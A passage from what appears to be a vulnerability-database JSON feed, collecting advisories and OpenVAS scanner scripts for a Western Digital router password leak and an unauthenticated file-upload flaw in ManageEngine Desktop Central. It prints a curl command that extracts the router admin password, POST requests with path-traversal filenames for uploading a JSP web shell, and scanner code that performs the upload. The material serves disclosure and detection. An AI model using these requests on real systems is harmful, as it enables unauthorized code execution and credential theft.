your favourite jsp shell here ...>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34518/"}, {"lastseen": "2016-02-03T05:32:26", "bulletinFamily": "exploit", "description": "Western Digital My Net Wireless Routers - Password Disclosure. CVE-2013-5006. Webapps exploit for hardware platform", "modified": "2013-08-02T00:00:00", "published": "2013-08-02T00:00:00", "id": "EDB-ID:27288", "href": "https://www.exploit-db.com/exploits/27288/", "type": "exploitdb", "title": "Western Digital My Net Wireless Routers - Password Disclosure", "sourceData": "Vulnerable Systems:\r\nWestern Digital My Net Series Wireless Routers:\r\nN600 Firmware 1.03.12\r\nN600 Firmware 1.04.16\r\n\r\nN750 Firmware 1.03.12\r\nN750 Firmware 1.04.16\r\n\r\nN900 Firmware 1.05.12\r\nN900 Firmware 1.06.18\r\nN900 Firmware 1.06.28\r\n\r\nN900C Firmware 1.05.12\r\nN900C Firmware 1.06.18\r\nN900C Firmware 1.06.28\r\n\r\nCVE 2013-5006\r\nCWE-256 Plaintext Storage of a Password\r\nCVSS Base Score 4.3\r\nCVSS Impact Subscore 2.9\r\nCvss Exploit Score 8.6\r\n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H)\r\n\r\nProof of concept:\r\ncurl -s http://<IP>:8080/main_internet.php? | egrep -i 'var pass'\r\n\r\nwhich will give an output similar to this ex:\r\nvar pass=\"\";\r\n\r\nDetails:\r\nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored.\r\n\r\nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'.
For this bug to be exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled.\r\n\r\nThe vendor has not responded to any inquiries concerning the bug.\r\n\r\nExternal Sources:\r\nOSVDB - http://www.osvdb.org/show/osvdb/95519\r\nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006\r\nIBM xforce - http://xforce.iss.net/xforce/xfdb/85903\r\nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433\r\nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006\r\n\r\nVendor's Network Router Product Pages:\r\nhttp://www.wdc.com/en/products/network/routers/\r\nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564\r\nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436\r\nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879\r\nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950\r\n\r\nAdditional Notes/Fixes/Workarounds:\r\n\r\nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected.\r\n\r\nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested.
The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities.\r\n\r\nDiscovered - 07-02-2013\r\nUpdated - 07-31-2013\r\nResearch Contact - K Lovett\r\nAffiliation - SUSnet", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/27288/"}], "openvas": [{"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "description": "Multiple ManageEngine Products are prone to an arbitrary-file-upload\n vulnerability.", "modified": "2019-03-05T00:00:00", "published": "2014-09-09T00:00:00", "id": "OPENVAS:1361412562310105084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105084", "title": "Multiple ManageEngine Products Arbitrary File Upload Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_manageengine_desktopcentral_69494.nasl 13994 2019-03-05 12:23:37Z cfischer $\n#\n# Multiple ManageEngine Products Arbitrary File Upload Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_desktop_central\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105084\");\n script_bugtraq_id(69494, 69493);\n script_cve_id(\"CVE-2014-5005\", \"CVE-2014-5006\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 13994 $\");\n script_name(\"Multiple ManageEngine Products Arbitrary File Upload Vulnerability\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 13:23:37 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-09 13:20:38 +0200 (Tue, 09 Sep 2014)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_manage_engine_desktop_central_detect.nasl\");\n script_mandatory_keys(\"ManageEngine/Desktop_Central/installed\");\n script_require_ports(\"Services/www\", 8020);\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/69494\");\n\n script_tag(name:\"impact\", value:\"An attacker may leverage this issue to upload arbitrary files to the\n affected computer. 
This can result in arbitrary code execution within the context of the vulnerable application.\");\n\n script_tag(name:\"vuldetect\", value:\"Check if it is possible to upload a file.\");\n\n script_tag(name:\"solution\", value:\"Ask the vendor for an update.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"Multiple ManageEngine Products are prone to an arbitrary-file-upload\n vulnerability.\");\n\n script_tag(name:\"affected\", value:\"ManageEngine Desktop Central versions 7 through 9 build 90054\n ManageEngine Desktop Central MSP.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nuseragent = http_get_user_agent();\n\nhost = http_host_name( port:port );\nvtstrings = get_vt_strings();\nvt_string_lo = vtstrings[\"lowercase\"];\nvt_string = vtstrings[\"default\"];\n\npat = vt_string + \" RCE Test\";\nex = '<%= new String(\"' + pat + '\") %>';\nlen = strlen( ex );\nfile = vt_string_lo + '_' + rand() + '.jsp';\nurl = dir + '/statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../' + file + '&configDataID=1';\n\nreq = 'POST ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n 'Accept: */*\\r\\n' +\n 'Content-Type: multipart/form-data;\\r\\n' +\n '\\r\\n' +\n ex;\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nurl = dir + \"/\" + file;\nreq = http_get( item:url, port:port );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( pat >< buf ) {\n report = 'It was possible to upload the file \"' + dir + '/' + file + '\". 
Please delete this file.';\n report += '\\n' + report_vuln_url( url:url, port:port );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:25", "bulletinFamily": "scanner", "description": "This host is running Western Digital My Net Router and is prone to information\n disclosure vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2013-08-05T00:00:00", "id": "OPENVAS:1361412562310803731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803731", "title": "Western Digital My Net Devices Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wdmn_wireless_router_info_disc_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Western Digital My Net Devices Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803731\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-5006\");\n script_bugtraq_id(61361);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-05 16:18:11 +0530 (Mon, 05 Aug 2013)\");\n script_name(\"Western Digital My Net Devices Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Western Digital My Net Router and is prone to information\n disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP request and check whether it is able to read the\n password or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.07.16, for the My Net N900 and My Net N900.\n For My Net N600 and My Net N750 solution is to revert to the earlier firmware of 1.01.04 or 1.01.20,\n or disable remote administrative access.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"insight\", value:\"The issue is due to the device storing the admin password in clear text in the\n main_internet.php source code page as the value for 'var pass'.\");\n\n script_tag(name:\"affected\", value:\"Western Digital My Net N600 1.03, 1.04,\n\n Western Digital My Net N750 1.03, 1.04,\n\n Western Digital My Net N900 1.05, 1.06 and\n\n Western Digital My Net N900C 1.05, 1.06\");\n\n script_tag(name:\"impact\", 
value:\"Successful exploitation will allow attacker to gain access to credential\n information.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/10\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/85903\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527433\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/bugtraq/2013-07/0146.html\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"MyNetN679/banner\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"http://www.wdc.com/en\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port: port);\nif(banner && banner =~ \"MyNetN[6|7|9]\")\n{\n req = http_get(item: \"/main_internet.php\", port:port);\n res = http_keepalive_send_recv(port:port,data:req);\n\n if(\">WESTERN DIGITAL\" >< res && \"WIRELESS ROUTER\" >< res\n && res =~ 'var pass=\".*\";' )\n {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T13:13:31", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-09-04T00:00:00", "published": "2014-09-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87216", "id": "SSV:87216", "type": "seebug", "title": "ManageEngine Desktop Central - Arbitrary File Upload / RCE", "sourceData": "\n Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP\r\nDiscovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information 
Security\r\n=================================================================================\r\n \r\nBackground on the affected product:\r\n\"Desktop Central is an integrated desktop & mobile device management\r\nsoftware that helps in managing the servers, laptops, desktops,\r\nsmartphones and tablets from a central point. It automates your\r\nregular desktop management routines like installing patches,\r\ndistributing software, managing your IT Assets, managing software\r\nlicenses, monitoring software usage statistics, managing USB device\r\nusage, taking control of remote desktops, and more.\"\r\n \r\nThere are several vulnerable servers out there if you know the\r\nGoogle dorks. Quoting the author of the Internet Census 2012: \"As a\r\nrule of thumb, if you believe that \"nobody would connect that to the\r\nInternet, really nobody\", there are at least 1000 people who did.\"\r\nThese vulnerabilities can be abused to achieve remote code execution\r\nas SYSTEM in Windows. I've updated the desktopcentral_file_upload\r\nMetasploit module to use the new statusUpdate technique. Needless to\r\nsay, owning a Desktop Central box will give you control of all the\r\ncomputers and smartphones it manages.\r\n \r\nTechnical details:\r\n#1\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: none; no authentication or any other information needed\r\n \r\na)\r\nCVE-2014-5005\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1\r\n<... your favourite jsp shell here ...>\r\n \r\nb)\r\nCVE-2014-5006\r\nAffected versions: all versions from v8 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /mdm/mdmLogUploader?filename=..\\\\..\\\\..\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<...
your favourite jsp shell here ...>\r\n \r\n \r\n#2\r\nCVE-2014-5007\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: no authentication needed; need to know valid\r\ncomputerName, domainName and customerId\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nNotes: This was previously discovered as CVE-2013-7390 / OSVDB-10008\r\nby Thomas Hibbert, and was \"fixed\" in 2013-11-09. The fix is\r\nincomplete and it is still possible to upload a shell with a valid\r\ncomputerName, domainName and customerId.\r\n \r\nPOST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... your favourite jsp shell here ...>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87216", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:26:43", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-80902", "id": "SSV:80902", "type": "seebug", "title": "Western Digital My Net Wireless Routers - Password Disclosure", "sourceData": "\n Vulnerable Systems:\r\nWestern Digital My Net Series Wireless Routers:\r\nN600 Firmware 1.03.12\r\nN600 Firmware 1.04.16\r\n\r\nN750 Firmware 1.03.12\r\nN750 Firmware 1.04.16\r\n\r\nN900 Firmware 1.05.12\r\nN900 Firmware 1.06.18\r\nN900 Firmware 1.06.28\r\n\r\nN900C Firmware 1.05.12\r\nN900C Firmware 1.06.18\r\nN900C Firmware 1.06.28\r\n\r\nCVE 2013-5006\r\nCWE-256 Plaintext Storage of a Password\r\nCVSS Base Score 4.3\r\nCVSS Impact Subscore 2.9\r\nCvss Exploit Score 8.6\r\n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H)\r\n\r\nProof of concept:\r\ncurl -s http://<IP>:8080/main_internet.php?
| egrep -i 'var pass'\r\n\r\nwhich will give an output similar to this ex:\r\nvar pass=\"\";\r\n\r\nDetails:\r\nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored.\r\n\r\nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'. For this bug to be exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled.\r\n\r\nThe vendor has not responded to any inquiries concerning the bug.\r\n\r\nExternal Sources:\r\nOSVDB - http://www.osvdb.org/show/osvdb/95519\r\nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006\r\nIBM xforce - http://xforce.iss.net/xforce/xfdb/85903\r\nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433\r\nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006\r\n\r\nVendor's Network Router Product Pages:\r\nhttp://www.wdc.com/en/products/network/routers/\r\nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564\r\nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436\r\nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879\r\nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950\r\n\r\nAdditional Notes/Fixes/Workarounds:\r\n\r\nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected.\r\n\r\nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested.
The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities.\r\n\r\nDiscovered - 07-02-2013\r\nUpdated - 07-31-2013\r\nResearch Contact - K Lovett\r\nAffiliation - SUSnet\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-80902", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:05", "bulletinFamily": "exploit", "description": "", "modified": "2014-08-31T00:00:00", "published": "2014-08-31T00:00:00", "href": "https://packetstormsecurity.com/files/128108/ManageEngine-Desktop-Central-Remote-Shell-Upload.html", "id": "PACKETSTORM:128108", "type": "packetstorm", "title": "ManageEngine Desktop Central Remote Shell Upload", "sourceData": "`>> Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \n \n>> Background on the affected product: \n\"Desktop Central is an integrated desktop & mobile device management \nsoftware that helps in managing the servers, laptops, desktops, \nsmartphones and tablets from a central point. It automates your \nregular desktop management routines like installing patches, \ndistributing software, managing your IT Assets, managing software \nlicenses, monitoring software usage statistics, managing USB device \nusage, taking control of remote desktops, and more.\" \n \nThere are several vulnerable servers out there if you know the \nGoogle dorks. Quoting the author of the Internet Census 2012: \"As a \nrule of thumb, if you believe that \"nobody would connect that to the \nInternet, really nobody\", there are at least 1000 people who did.\" \nThese vulnerabilities can be abused to achieve remote code execution \nas SYSTEM in Windows.
I've updated the desktopcentral_file_upload \nMetasploit module to use the new statusUpdate technique. Needless to \nsay, owning a Desktop Central box will give you control of all the \ncomputers and smartphones it manages. \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated) \nConstraints: none; no authentication or any other information needed \n \na) \nCVE-2014-5005 \nAffected versions: all versions from v7 to v9 build 90054 \nFix: Upgrade to DC v9 build 90055 \nPOST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1 \n<... your favourite jsp shell here ...> \n \nb) \nCVE-2014-5006 \nAffected versions: all versions from v8 to v9 build 90054 \nFix: Upgrade to DC v9 build 90055 \nPOST /mdm/mdmLogUploader?filename=..\\\\..\\\\..\\webapps\\\\DesktopCentral\\\\shell.jsp \n<... your favourite jsp shell here ...> \n \n \n#2 \nCVE-2014-5007 \nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated) \nConstraints: no authentication needed; need to know valid \ncomputerName, domainName and customerId \nAffected versions: all versions from v7 to v9 build 90054 \nFix: Upgrade to DC v9 build 90055 \nNotes: This was previously discovered as CVE-2013-7390 / OSVDB-10008 \nby Thomas Hibbert, and was \"fixed\" in 2013-11-09. The fix is \nincomplete and it is still possible to upload a shell with a valid \ncomputerName, domainName and customerId. \n \nPOST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\shell.jsp \n<... 
your favourite jsp shell here ...> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128108/managedc-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:20:24", "bulletinFamily": "exploit", "description": "", "modified": "2013-08-01T00:00:00", "published": "2013-08-01T00:00:00", "href": "https://packetstormsecurity.com/files/122640/Western-Digital-My-Net-Password-Disclosure.html", "id": "PACKETSTORM:122640", "type": "packetstorm", "title": "Western Digital My Net Password Disclosure", "sourceData": "`Vulnerable Systems: \nWestern Digital My Net Series Wireless Routers: \nN600 Firmware 1.03.12 \nN600 Firmware 1.04.16 \n \nN750 Firmware 1.03.12 \nN750 Firmware 1.04.16 \n \nN900 Firmware 1.05.12 \nN900 Firmware 1.06.18 \nN900 Firmware 1.06.28 \n \nN900C Firmware 1.05.12 \nN900C Firmware 1.06.18 \nN900C Firmware 1.06.28 \n \nCVE 2013-5006 \nCWE-256 Plaintext Storage of a Password \nCVSS Base Score 4.3 \nCVSS Impact Subscore 2.9 \nCvss Exploit Score 8.6 \n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H) \n \nProof of concept: \ncurl -s http://<IP>:8080/main_internet.php? | egrep -i 'var pass' \n \nwhich will give an output similar to this ex: \nvar pass=\"\"; \n \nDetails: \nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored. \n \nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'. For this bug to be exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled. \n \nThe vendor has not responded to any inquiries concerning the bug.
\n \nExternal Sources: \nOSVDB - http://www.osvdb.org/show/osvdb/95519 \nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006 \nIBM xforce - http://xforce.iss.net/xforce/xfdb/85903 \nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433 \nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006 \n \nVendor's Network Router Product Pages: \nhttp://www.wdc.com/en/products/network/routers/ \nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564 \nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436 \nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879 \nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950 \n \nAdditional Notes/Fixes/Workarounds: \n \nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected. \n \nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested. The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities. 
\n \nDiscovered - 07-02-2013 \nUpdated - 07-31-2013 \nResearch Contact - K Lovett \nAffiliation - SUSnet \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122640/wdmynetn-disclose.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "description": "\r\n\r\nVulnerable Systems:\r\nWestern Digital My Net Series Wireless Routers:\r\nN600 Firmware 1.03.12\r\nN600 Firmware 1.04.16\r\n\r\nN750 Firmware 1.03.12\r\nN750 Firmware 1.04.16\r\n\r\nN900 Firmware 1.05.12\r\nN900 Firmware 1.06.18\r\nN900 Firmware 1.06.28\r\n\r\nN900C Firmware 1.05.12\r\nN900C Firmware 1.06.18\r\nN900C Firmware 1.06.28\r\n\r\nCVE 2013-5006\r\nCWE-256 Plaintext Storage of a Password\r\nCVSS Base Score \t 4.3\r\nCVSS Impact Subscore 2.9\r\nCvss Exploit Score\t 8.6\r\n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H)\r\n\r\nProof of concept:\r\ncurl -s http://<IP>:8080/main_internet.php? | egrep -i 'var pass'\r\n\r\nwhich will give an output similar to this ex:\r\nvar pass=\"\";\r\n\r\nDetails:\r\nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored.\r\n\r\nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'.
For this bug to be exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled.\r\n\r\nThe vendor has not responded to any inquiries concerning the bug.\r\n\r\nExternal Sources:\r\nOSVDB - http://www.osvdb.org/show/osvdb/95519\r\nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006\r\nIBM xforce - http://xforce.iss.net/xforce/xfdb/85903\r\nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433\r\nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006\r\n\r\nVendor's Network Router Product Pages:\r\nhttp://www.wdc.com/en/products/network/routers/\r\nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564\r\nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436\r\nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879\r\nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950\r\n\r\nAdditional Notes/Fixes/Workarounds:\r\n\r\nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected.\r\n\r\nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested.
The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities.\r\n\r\nDiscovered - 07-02-2013\r\nUpdated - 07-31-2013\r\nResearch Contact - K Lovett\r\nAffiliation - SUSnet\r\n", "modified": "2013-08-12T00:00:00", "published": "2013-08-12T00:00:00", "id": "SECURITYVULNS:DOC:29702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29702", "title": "Update: Full Disclosure - WD My Net N600, N750, N900, N900C - Plain Text Disclosure of Admin Credentials", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "description": "Unauthorized access, information leakages.", "modified": "2013-08-12T00:00:00", "published": "2013-08-12T00:00:00", "id": "SECURITYVULNS:VULN:13199", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13199", "title": "WD My Net security vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}